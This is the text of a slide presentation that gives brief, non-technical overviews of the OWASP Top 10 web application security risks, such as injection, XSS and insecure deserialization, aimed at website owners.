Tata AIG General Insurance Company - Insurer Innovation Award 2024
Owasp Top 10 Vulnerabilities List
1. OWASP Top 10 Vulnerabilities List
TECHNOL OGY INNOVATION PROCESS
By YITSOL
2. With the online world gaining more importance with every passing day,
website security needs to be one of the leading priorities for site owners
everywhere. That said, there are some vulnerabilities and issues that are
more important others, and it’s necessary to prioritise these over others.
TECHNOL OGY INNOVATION PROCESS
Now, that’s where the OWASP(Open Web Application Security Project)
top 10 list of security vulnerabilities comes in, as this list includes the top
things to look out for, in order to secure your website, and keep it free
from threats and vulnerabilities.
Let’s find out the top ten vulnerabilities or security risks here:
3. #1 Injection flaws:
TECHNOL OGY INNOVATION PROCESS
This takes place when un-trusted data is included and sent as part of a
query or indeed a command. Primarily, this is done through an SQL
injection, but some other types do often occur.
The entry-point for this vulnerability is usually through un-sanitized user
info and data – this is what makes this vulnerability a dangerous thing,
and one website owners should prioritize.
4. #2 Authentication problems:
TECHNOL OGY INNOVATION PROCESS
This occurs when authentication and session management solutions are
incorrectly implemented.
This results in the administrative accounts being placed in the hands of
unscrupulous online attackers who can then access and use credentials
(passwords, session tokens, keys and usernames) for their own benefit.
5. #3 Sensitive data exposure:
TECHNOL OGY INNOVATION PROCESS
Much like the risk as detailed in the point above, this vulnerability occurs
due to the compromising of user inputted info and data. This makes the
users’ personal info, such as, addresses, payment details and so forth
easily available to attackers.
Now, while this is bad for the customers, this is also a huge worry for
businesses and websites as well, as they are likely to lose users and
customers for breaches of this nature.
6. #4 XML external entities:
TECHNOL OGY INNOVATION PROCESS
Simply put, this vulnerability can be described to be an injection type of
attack that is executed by malicious code within Extensible Markup
Language (XML) files. One of the primary ways of fixing this issue is to
use a less complex data format such as JSON, wherever possible.
7. #5 Broken access control:
TECHNOL OGY INNOVATION PROCESS
Controls that determine user permission, usually referred to as access
controls, can be broken as well. In this scenario, a user who does not
have the necessary permissions is mistakenly allowed to access certain
areas, and this could lead to disastrous consequences for the website
and business.
8. #6 Security misconfiguration:
TECHNOL OGY INNOVATION PROCESS
So, while security misconfiguration problems can arise on account of
code-related issues, they usually only take place because of user errors.
Therefore, this vulnerability can result in much the same risks as
vulnerabilities associated with permission breaches. This issue should be
addressed as soon as possible, to ensure continued smooth and risk free
operation of the website.
9. #7 Cross-site scripting (XSS):
TECHNOL OGY INNOVATION PROCESS
This issue occurs when the attackers take advantage of the dynamic
elements of the website to then proceed to ‘hijack’ the browser and
computer of the user.
This threat must be kept at bay, as this is one of the basic and vital
issues, as far as user trust and relationships are concerned.
10. #8 Insecure deserialization:
TECHNOL OGY INNOVATION PROCESS
Sensitive and important data can be exposed and made available to
attackers when untrusted data is being serialized and deserialized.
The data that can be exposed includes, API authentication tokens,
caches, databases and much more. Deserialization attacks can also result
in privilege escalation attacks, injection attacks, and even replay attacks.
11. #9 The use of components with known vulnerabilities:
TECHNOL OGY INNOVATION PROCESS
Many components enjoy the same privileges that the applications enjoy
– these components include, libraries, frameworks, and other software
modules.
When the vulnerability of a particular component is exploited, this can
result in a significant loss of data or even a server takeover. Therefore,
the use of components with known vulnerabilities should be avoided at
all costs by the website owner.
12. #10 Insufficient logging and monitoring:
TECHNOL OGY INNOVATION PROCESS
While this is not a direct vulnerability, your website can fall prey to any
of the risks and threats as mentioned in the last nine points, if
insufficient or no logging and monitoring is carried out by the business
or website manager.
What’s more, if they do not carry out the necessary amounts of logging
and monitoring, you may not even be aware that your site is under
attack, and this can lead to a whole host of problems.
13. Conclusion:
TECHNOL OGY INNOVATION PROCESS
We do hope you found this presentation on OWASP top 10 vulnerabilities
list, useful, and we do encourage you to pay attention to these
vulnerabilities and ensure that your website always remains, safe, secure
and risk free.